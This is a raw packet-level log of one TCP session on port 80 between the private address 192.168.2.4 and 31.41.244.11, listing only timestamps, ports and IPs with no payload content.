Jan 7, 2025 10:09:02.087138891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.087152958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.091470957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.091490030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.091500998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.091593027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.091598034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.091605902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.091624022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.091633081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.091684103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.091684103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.091713905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.113401890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.113457918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.113471031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.113481045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.113524914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.113526106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.113534927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.113545895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.113585949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.113601923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139338970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139380932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139394045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139426947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139432907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139461040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139484882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139486074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139497995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139511108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139522076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139559984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139589071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139597893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139609098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139619112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139655113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139662981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139667034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139678955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139723063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139801025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139827013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139832973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139839888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139849901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139861107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139889956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139934063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139945984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139955997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139965057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139966011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139978886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.139980078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.139995098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140007973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140013933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140026093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140037060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140037060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140058041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140079975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140122890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140136003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140147924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140157938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140204906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140204906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140254974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140266895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140276909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140288115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140297890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140299082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140311003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140321970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140331984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140332937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140360117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140360117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140376091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140458107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140469074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140480042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140497923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140507936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140516996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140517950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140517950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140528917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140557051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140589952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140651941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140662909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140675068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140686989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140697956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140698910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140708923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140722036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140733957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140737057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140750885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140752077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140769005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140769005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140796900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140845060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140876055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140887976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140898943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140909910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140947104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140947104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.140955925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140968084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140979052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.140990973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141002893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141026020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141062021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141062021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141100883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141113997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141124964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141134977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141145945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141158104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141169071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141180992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141182899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141192913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141212940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141225100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141247034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141371965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141383886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141401052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141411066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141422033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141452074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141464949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141486883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141499043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141509056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141524076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141555071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.141869068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141933918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141943932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141956091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141967058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141985893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.141990900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.142003059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.142014027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.142036915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.142036915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.142065048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.173631907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173645020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173656940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173693895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.173726082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173739910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173753023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.173755884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173769951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173782110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173789978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.173805952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173810959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173826933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.173851967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173862934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173938990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173943043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.173950911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173963070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.173990965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.173990965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.174021959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.178251982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.178271055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.178282022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.178319931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.178329945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.178329945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.178376913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.178492069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.178509951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.178520918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.178535938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.178565979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.178580046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.200196981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.200216055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.200228930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.200242996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.200270891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.200275898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.200289011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.200306892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.200325966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.200336933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.200378895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.200378895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226119995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226140976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226150990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226171970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226176977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226212978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226222038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226233959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226238966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226267099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226278067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226289034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226305008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226305962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226316929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226327896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226331949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226331949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226370096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226547956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226560116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226573944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226586103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226597071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226608038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226628065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226629019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226640940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226644039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226653099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226660967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226696968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226716042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226793051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226804018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226814032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226824045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226840973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226851940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226861954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226865053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226874113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226880074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226886034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226893902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226903915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226914883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226943016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226943016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226957083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226968050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226979971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.226982117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.226994991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227006912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227016926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227026939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227026939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227056026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227091074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227092028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227103949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227116108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227128029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227138042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227148056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227149010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227159023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227181911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227188110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227197886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227209091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227221012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227221012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227246046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227262020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227272987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227274895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227284908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227334023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227350950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227363110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227374077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227386951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227400064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227404118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227404118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227404118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227415085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227440119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227440119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227468967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227495909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227507114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227519035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227529049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227538109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227540970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227554083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227555990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227566957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227577925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227596998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227615118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227623940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227637053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227653027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227665901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227675915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227685928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227699995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227708101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227720976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227735043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227751017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227756023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227766991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227777958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.227807999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227807999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.227818966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.228133917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228198051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228209972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228219986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228224039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.228234053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.228275061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.228286982 CET	50017	80	192.168.2.4	31.41.244.11
